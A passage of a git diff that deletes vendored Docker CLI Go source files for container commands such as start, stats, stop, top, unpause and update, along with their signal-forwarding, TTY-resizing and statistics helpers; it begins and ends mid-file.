daemon: ") - statusError := cli.StatusError{StatusCode: 125} - if strings.Contains(trimmedErr, "executable file not found") || - strings.Contains(trimmedErr, "no such file or directory") || - strings.Contains(trimmedErr, "system cannot find the file specified") { - statusError = cli.StatusError{StatusCode: 127} - } else if strings.Contains(trimmedErr, syscall.EACCES.Error()) { - statusError = cli.StatusError{StatusCode: 126} - } - - return statusError -} diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go deleted file mode 100644 index 3521a41949..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/start.go +++ /dev/null @@ -1,179 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/promise" - "github.com/docker/docker/pkg/signal" - "github.com/spf13/cobra" -) - -type startOptions struct { - attach bool - openStdin bool - detachKeys string - checkpoint string - checkpointDir string - - containers []string -} - -// NewStartCommand creates a new cobra.Command for `docker start` -func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts startOptions - - cmd := &cobra.Command{ - Use: "start [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Start one or more stopped containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runStart(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals") - flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - - flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint") - flags.SetAnnotation("checkpoint", "experimental", nil) - flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory") - flags.SetAnnotation("checkpoint-dir", "experimental", nil) - return cmd -} - -func runStart(dockerCli *command.DockerCli, opts *startOptions) error { - ctx, cancelFun := context.WithCancel(context.Background()) - - if opts.attach || opts.openStdin { - // We're going to attach to a container. - // 1. Ensure we only have one container. - if len(opts.containers) > 1 { - return fmt.Errorf("You cannot start and attach multiple containers at once.") - } - - // 2. Attach to the container. - container := opts.containers[0] - c, err := dockerCli.Client().ContainerInspect(ctx, container) - if err != nil { - return err - } - - // We always use c.ID instead of container to maintain consistency during `docker start` - if !c.Config.Tty { - sigc := ForwardAllSignals(ctx, dockerCli, c.ID) - defer signal.StopCatch(sigc) - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: opts.openStdin && c.Config.OpenStdin, - Stdout: true, - Stderr: true, - DetachKeys: dockerCli.ConfigFile().DetachKeys, - } - - var in io.ReadCloser - - if options.Stdin { - in = dockerCli.In() - } - - resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach return an ErrPersistEOF (connection closed) - // means server met an error and already put it in Hijacked connection, - // we would keep the error and read the detailed error message from hijacked connection - return errAttach - } - defer resp.Close() - cErr := promise.Go(func() error { - errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp) - if errHijack == nil { - return errAttach - } - return errHijack - }) - - // 3. We should open a channel for receiving status code of the container - // no matter it's detached, removed on daemon side(--rm) or exit normally. - statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove) - startOptions := types.ContainerStartOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - } - - // 4. Start the container. - if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil { - cancelFun() - <-cErr - if c.HostConfig.AutoRemove { - // wait container to be removed - <-statusChan - } - return err - } - - // 5. Wait for attachment to break. - if c.Config.Tty && dockerCli.Out().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil { - fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) - } - } - if attchErr := <-cErr; attchErr != nil { - return attchErr - } - - if status := <-statusChan; status != 0 { - return cli.StatusError{StatusCode: status} - } - } else if opts.checkpoint != "" { - if len(opts.containers) > 1 { - return fmt.Errorf("You cannot restore multiple containers at once.") - } - container := opts.containers[0] - startOptions := types.ContainerStartOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - } - return dockerCli.Client().ContainerStart(ctx, container, startOptions) - - } else { - // We're not going to attach to anything. - // Start as many containers as we want. - return startContainersWithoutAttachments(ctx, dockerCli, opts.containers) - } - - return nil -} - -func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error { - var failedContainers []string - for _, container := range containers { - if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - failedContainers = append(failedContainers, container) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - - if len(failedContainers) > 0 { - return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", ")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go deleted file mode 100644 index 12d5c68522..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats.go +++ /dev/null @@ -1,243 +0,0 @@ -package container - -import ( - "fmt" - "io" - "strings" - "sync" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/events" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/spf13/cobra" -) - -type statsOptions struct { - all bool - noStream bool - format string - containers []string -} - -// NewStatsCommand creates a new cobra.Command for `docker stats` -func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts statsOptions - - cmd := &cobra.Command{ - Use: "stats [OPTIONS] [CONTAINER...]", - Short: "Display a live stream of container(s) resource usage statistics", - Args: cli.RequiresMinArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runStats(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") - flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result") - flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") - return cmd -} - -// runStats displays a live stream of resource usage statistics for one or more containers. -// This shows real-time information on CPU usage, memory usage, and network I/O. -func runStats(dockerCli *command.DockerCli, opts *statsOptions) error { - showAll := len(opts.containers) == 0 - closeChan := make(chan error) - - ctx := context.Background() - - // monitorContainerEvents watches for container creation and removal (only - // used when calling `docker stats` without arguments). - monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) { - f := filters.NewArgs() - f.Add("type", "container") - options := types.EventsOptions{ - Filters: f, - } - - eventq, errq := dockerCli.Client().Events(ctx, options) - - // Whether we successfully subscribed to eventq or not, we can now - // unblock the main goroutine. - close(started) - - for { - select { - case event := <-eventq: - c <- event - case err := <-errq: - closeChan <- err - return - } - } - } - - // Get the daemonOSType if not set already - if daemonOSType == "" { - svctx := context.Background() - sv, err := dockerCli.Client().ServerVersion(svctx) - if err != nil { - return err - } - daemonOSType = sv.Os - } - - // waitFirst is a WaitGroup to wait first stat data's reach for each container - waitFirst := &sync.WaitGroup{} - - cStats := stats{} - // getContainerList simulates creation event for all previously existing - // containers (only used when calling `docker stats` without arguments). - getContainerList := func() { - options := types.ContainerListOptions{ - All: opts.all, - } - cs, err := dockerCli.Client().ContainerList(ctx, options) - if err != nil { - closeChan <- err - } - for _, container := range cs { - s := formatter.NewContainerStats(container.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - } - - if showAll { - // If no names were specified, start a long running goroutine which - // monitors container events. We make sure we're subscribed before - // retrieving the list of running containers to avoid a race where we - // would "miss" a creation. - started := make(chan struct{}) - eh := command.InitEventHandler() - eh.Handle("create", func(e events.Message) { - if opts.all { - s := formatter.NewContainerStats(e.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - }) - - eh.Handle("start", func(e events.Message) { - s := formatter.NewContainerStats(e.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - }) - - eh.Handle("die", func(e events.Message) { - if !opts.all { - cStats.remove(e.ID[:12]) - } - }) - - eventChan := make(chan events.Message) - go eh.Watch(eventChan) - go monitorContainerEvents(started, eventChan) - defer close(eventChan) - <-started - - // Start a short-lived goroutine to retrieve the initial list of - // containers. - getContainerList() - } else { - // Artificially send creation events for the containers we were asked to - // monitor (same code path than we use when monitoring all containers). - for _, name := range opts.containers { - s := formatter.NewContainerStats(name, daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - - // We don't expect any asynchronous errors: closeChan can be closed. - close(closeChan) - - // Do a quick pause to detect any error with the provided list of - // container names. - time.Sleep(1500 * time.Millisecond) - var errs []string - cStats.mu.Lock() - for _, c := range cStats.cs { - cErr := c.GetError() - if cErr != nil { - errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr)) - } - } - cStats.mu.Unlock() - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, ", ")) - } - } - - // before print to screen, make sure each container get at least one valid stat data - waitFirst.Wait() - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().StatsFormat) > 0 { - format = dockerCli.ConfigFile().StatsFormat - } else { - format = formatter.TableFormatKey - } - } - statsCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewStatsFormat(format, daemonOSType), - } - cleanScreen := func() { - if !opts.noStream { - fmt.Fprint(dockerCli.Out(), "\033[2J") - fmt.Fprint(dockerCli.Out(), "\033[H") - } - } - - var err error - for range time.Tick(500 * time.Millisecond) { - cleanScreen() - ccstats := []formatter.StatsEntry{} - cStats.mu.Lock() - for _, c := range cStats.cs { - ccstats = append(ccstats, c.GetStatistics()) - } - cStats.mu.Unlock() - if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil { - break - } - if len(cStats.cs) == 0 && !showAll { - break - } - if opts.noStream { - break - } - select { - case err, ok := <-closeChan: - if ok { - if err != nil { - // this is suppressing "unexpected EOF" in the cli when the - // daemon restarts so it shutdowns cleanly - if err == io.ErrUnexpectedEOF { - return nil - } - return err - } - } - default: - // just skip - } - } - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go deleted file mode 100644 index 4b57e3fe05..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go +++ /dev/null @@ -1,226 +0,0 @@ -package container - -import ( - "encoding/json" - "errors" - "io" - "strings" - "sync" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -type stats struct { - ostype string - mu sync.Mutex - cs []*formatter.ContainerStats -} - -// daemonOSType is set once we have at least one stat for a container -// from the daemon. It is used to ensure we print the right header based -// on the daemon platform. -var daemonOSType string - -func (s *stats) add(cs *formatter.ContainerStats) bool { - s.mu.Lock() - defer s.mu.Unlock() - if _, exists := s.isKnownContainer(cs.Container); !exists { - s.cs = append(s.cs, cs) - return true - } - return false -} - -func (s *stats) remove(id string) { - s.mu.Lock() - if i, exists := s.isKnownContainer(id); exists { - s.cs = append(s.cs[:i], s.cs[i+1:]...) - } - s.mu.Unlock() -} - -func (s *stats) isKnownContainer(cid string) (int, bool) { - for i, c := range s.cs { - if c.Container == cid { - return i, true - } - } - return -1, false -} - -func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) { - logrus.Debugf("collecting stats for %s", s.Container) - var ( - getFirst bool - previousCPU uint64 - previousSystem uint64 - u = make(chan error, 1) - ) - - defer func() { - // if error happens and we get nothing of stats, release wait group whatever - if !getFirst { - getFirst = true - waitFirst.Done() - } - }() - - response, err := cli.ContainerStats(ctx, s.Container, streamStats) - if err != nil { - s.SetError(err) - return - } - defer response.Body.Close() - - dec := json.NewDecoder(response.Body) - go func() { - for { - var ( - v *types.StatsJSON - memPercent = 0.0 - cpuPercent = 0.0 - blkRead, blkWrite uint64 // Only used on Linux - mem = 0.0 - memLimit = 0.0 - memPerc = 0.0 - pidsStatsCurrent uint64 - ) - - if err := dec.Decode(&v); err != nil { - dec = json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body)) - u <- err - if err == io.EOF { - break - } - time.Sleep(100 * time.Millisecond) - continue - } - - daemonOSType = response.OSType - - if daemonOSType != "windows" { - // MemoryStats.Limit will never be 0 unless the container is not running and we haven't - // got any data from cgroup - if v.MemoryStats.Limit != 0 { - memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0 - } - previousCPU = v.PreCPUStats.CPUUsage.TotalUsage - previousSystem = v.PreCPUStats.SystemUsage - cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v) - blkRead, blkWrite = calculateBlockIO(v.BlkioStats) - mem = float64(v.MemoryStats.Usage) - memLimit = float64(v.MemoryStats.Limit) - memPerc = memPercent - pidsStatsCurrent = v.PidsStats.Current - } else { - cpuPercent = calculateCPUPercentWindows(v) - blkRead = v.StorageStats.ReadSizeBytes - blkWrite = v.StorageStats.WriteSizeBytes - mem = float64(v.MemoryStats.PrivateWorkingSet) - } - netRx, netTx := calculateNetwork(v.Networks) - s.SetStatistics(formatter.StatsEntry{ - Name: v.Name, - ID: v.ID, - CPUPercentage: cpuPercent, - Memory: mem, - MemoryPercentage: memPerc, - MemoryLimit: memLimit, - NetworkRx: netRx, - NetworkTx: netTx, - BlockRead: float64(blkRead), - BlockWrite: float64(blkWrite), - PidsCurrent: pidsStatsCurrent, - }) - u <- nil - if !streamStats { - return - } - } - }() - for { - select { - case <-time.After(2 * time.Second): - // zero out the values if we have not received an update within - // the specified duration. - s.SetErrorAndReset(errors.New("timeout waiting for stats")) - // if this is the first stat you get, release WaitGroup - if !getFirst { - getFirst = true - waitFirst.Done() - } - case err := <-u: - if err != nil { - s.SetError(err) - continue - } - s.SetError(nil) - // if this is the first stat you get, release WaitGroup - if !getFirst { - getFirst = true - waitFirst.Done() - } - } - if !streamStats { - return - } - } -} - -func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 { - var ( - cpuPercent = 0.0 - // calculate the change for the cpu usage of the container in between readings - cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU) - // calculate the change for the entire system between readings - systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem) - ) - - if systemDelta > 0.0 && cpuDelta > 0.0 { - cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 - } - return cpuPercent -} - -func calculateCPUPercentWindows(v *types.StatsJSON) float64 { - // Max number of 100ns intervals between the previous time read and now - possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals - possIntervals /= 100 // Convert to number of 100ns intervals - possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors - - // Intervals used - intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage - - // Percentage avoiding divide-by-zero - if possIntervals > 0 { - return float64(intervalsUsed) / float64(possIntervals) * 100.0 - } - return 0.00 -} - -func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) { - for _, bioEntry := range blkio.IoServiceBytesRecursive { - switch strings.ToLower(bioEntry.Op) { - case "read": - blkRead = blkRead + bioEntry.Value - case "write": - blkWrite = blkWrite + bioEntry.Value - } - } - return -} - -func calculateNetwork(network map[string]types.NetworkStats) (float64, float64) { - var rx, tx float64 - - for _, v := range network { - rx += float64(v.RxBytes) - tx += float64(v.TxBytes) - } - return rx, tx -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go deleted file mode 100644 index 828d634c8a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go +++ /dev/null @@ -1,20 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -func TestCalculateBlockIO(t *testing.T) { - blkio := types.BlkioStats{ - IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}}, - } - blkRead, blkWrite := calculateBlockIO(blkio) - if blkRead != 5801 { - t.Fatalf("blkRead = %d, want 5801", blkRead) - } - if blkWrite != 579 { - t.Fatalf("blkWrite = %d, want 579", blkWrite) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go deleted file mode 100644 index c68ede5368..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stop.go +++ /dev/null @@ -1,67 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type stopOptions struct { - time int - timeChanged bool - - containers []string -} - -// NewStopCommand creates a new cobra.Command for `docker stop` -func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts stopOptions - - cmd := &cobra.Command{ - Use: "stop [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Stop one or more running containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - opts.timeChanged = cmd.Flags().Changed("time") - return runStop(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it") - return cmd -} - -func runStop(dockerCli *command.DockerCli, opts *stopOptions) error { - ctx := context.Background() - - var timeout *time.Duration - if opts.timeChanged { - timeoutValue := time.Duration(opts.time) * time.Second - timeout = &timeoutValue - } - - var errs []string - - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error { - return dockerCli.Client().ContainerStop(ctx, id, timeout) - }) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go deleted file mode 100644 index 160153ba7f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/top.go +++ /dev/null @@ -1,58 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type topOptions struct { - container string - - args []string -} - -// NewTopCommand creates a new cobra.Command for `docker top` -func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts topOptions - - cmd := &cobra.Command{ - Use: "top CONTAINER [ps OPTIONS]", - Short: "Display the running processes of a container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - opts.args = args[1:] - return runTop(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - return cmd -} - -func runTop(dockerCli *command.DockerCli, opts *topOptions) error { - ctx := context.Background() - - procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintln(w, strings.Join(procList.Titles, "\t")) - - for _, proc := range procList.Processes { - fmt.Fprintln(w, strings.Join(proc, "\t")) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go deleted file mode 100644 index 6af8e2becf..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/tty.go +++ /dev/null @@ -1,103 +0,0 @@ -package container - -import ( - "fmt" - "os" - gosignal "os/signal" - "runtime" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/client" - "github.com/docker/docker/pkg/signal" - "golang.org/x/net/context" -) - -// resizeTtyTo resizes tty to specific height and width -func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) { - if height == 0 && width == 0 { - return - } - - options := types.ResizeOptions{ - Height: height, - Width: width, - } - - var err error - if isExec { - err = client.ContainerExecResize(ctx, id, options) - } else { - err = client.ContainerResize(ctx, id, options) - } - - if err != nil { - logrus.Debugf("Error resize: %s", err) - } -} - -// MonitorTtySize updates the container tty size when the terminal tty changes size -func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error { - resizeTty := func() { - height, width := cli.Out().GetTtySize() - resizeTtyTo(ctx, cli.Client(), id, height, width, isExec) - } - - resizeTty() - - if runtime.GOOS == "windows" { - go func() { - prevH, prevW := cli.Out().GetTtySize() - for { - time.Sleep(time.Millisecond * 250) - h, w := cli.Out().GetTtySize() - - if prevW != w || prevH != h { - resizeTty() - } - prevH = h - prevW = w - } - }() - } else { - sigchan := make(chan os.Signal, 1) - gosignal.Notify(sigchan, signal.SIGWINCH) - go func() { - for range sigchan { - resizeTty() - } - }() - } - return nil -} - -// ForwardAllSignals forwards signals to the container -func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal { - sigc := make(chan os.Signal, 128) - signal.CatchAll(sigc) - go func() { - for s := range sigc { - if s == signal.SIGCHLD || s == signal.SIGPIPE { - continue - } - var sig string - for sigStr, sigN := range signal.SignalMap { - if sigN == s { - sig = sigStr - break - } - } - if sig == "" { - fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s) - continue - } - - if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil { - logrus.Debugf("Error sending signal: %s", err) - } - } - }() - return sigc -} diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go deleted file mode 100644 index c4d8d4841e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/unpause.go +++ /dev/null @@ -1,50 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type unpauseOptions struct { - containers []string -} - -// NewUnpauseCommand creates a new cobra.Command for `docker unpause` -func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts unpauseOptions - - cmd := &cobra.Command{ - Use: "unpause CONTAINER [CONTAINER...]", - Short: "Unpause all processes within one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runUnpause(dockerCli, &opts) - }, - } - return cmd -} - -func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error { - ctx := context.Background() - - var errs []string - errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go deleted file mode 100644 index 75765856c5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/update.go +++ /dev/null @@ -1,163 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type updateOptions struct { - blkioWeight uint16 - cpuPeriod int64 - cpuQuota int64 - cpuRealtimePeriod int64 - cpuRealtimeRuntime int64 - cpusetCpus string - cpusetMems string - cpuShares int64 - memoryString string - memoryReservation string - memorySwap string - kernelMemory string - restartPolicy string - - nFlag int - - containers []string -} - -// NewUpdateCommand creates a new cobra.Command for `docker update` -func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts updateOptions - - cmd := &cobra.Command{ - Use: "update [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Update configuration of one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - opts.nFlag = cmd.Flags().NFlag() - return runUpdate(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") - flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") - flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") - flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") - flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit") - flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit") - flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit") - flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits") - - return cmd -} - -func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error { - var err error - - if opts.nFlag == 0 { - return fmt.Errorf("You must provide one or more flags when using this command.") - } - - var memory int64 - if opts.memoryString != "" { - memory, err = units.RAMInBytes(opts.memoryString) - if err != nil { - return err - } - } - - var memoryReservation int64 - if opts.memoryReservation != "" { - memoryReservation, err = units.RAMInBytes(opts.memoryReservation) - if err != nil { - return err - } - } - - var memorySwap int64 - if opts.memorySwap != "" { - if opts.memorySwap == "-1" { - memorySwap = -1 - } else { - memorySwap, err = units.RAMInBytes(opts.memorySwap) - if err != nil { - return err - } - } - } - - var kernelMemory int64 - if opts.kernelMemory != "" { - kernelMemory, err = units.RAMInBytes(opts.kernelMemory) - if err != nil { - return err - } - } - - var restartPolicy containertypes.RestartPolicy - if opts.restartPolicy != "" { - restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy) - if err != nil { - return err - } - } - - resources := containertypes.Resources{ - BlkioWeight: opts.blkioWeight, - CpusetCpus: opts.cpusetCpus, - CpusetMems: opts.cpusetMems, - CPUShares: opts.cpuShares, - Memory: memory, - MemoryReservation: memoryReservation, - MemorySwap: memorySwap, - KernelMemory: kernelMemory, - CPUPeriod: opts.cpuPeriod, - CPUQuota: opts.cpuQuota, - CPURealtimePeriod: opts.cpuRealtimePeriod, - CPURealtimeRuntime: opts.cpuRealtimeRuntime, - } - - updateConfig := containertypes.UpdateConfig{ - Resources: resources, - RestartPolicy: restartPolicy, - } - - ctx := context.Background() - - var ( - warns []string - errs []string - ) - for _, container := range opts.containers { - r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig) - if err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - warns = append(warns, r.Warnings...) - } - if len(warns) > 0 { - fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n")) - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go deleted file mode 100644 index 6bef92463c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/utils.go +++ /dev/null @@ -1,143 +0,0 @@ -package container - -import ( - "strconv" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/events" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/cli/command" - clientapi "github.com/docker/docker/client" -) - -func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int { - if len(containerID) == 0 { - // containerID can never be empty - panic("Internal Error: waitExitOrRemoved needs a containerID as parameter") - } - - var removeErr error - statusChan := make(chan int) - exitCode := 125 - - // Get events via Events API - f := filters.NewArgs() - f.Add("type", "container") - f.Add("container", containerID) - options := types.EventsOptions{ - Filters: f, - } - eventCtx, cancel := context.WithCancel(ctx) - eventq, errq := dockerCli.Client().Events(eventCtx, options) - - 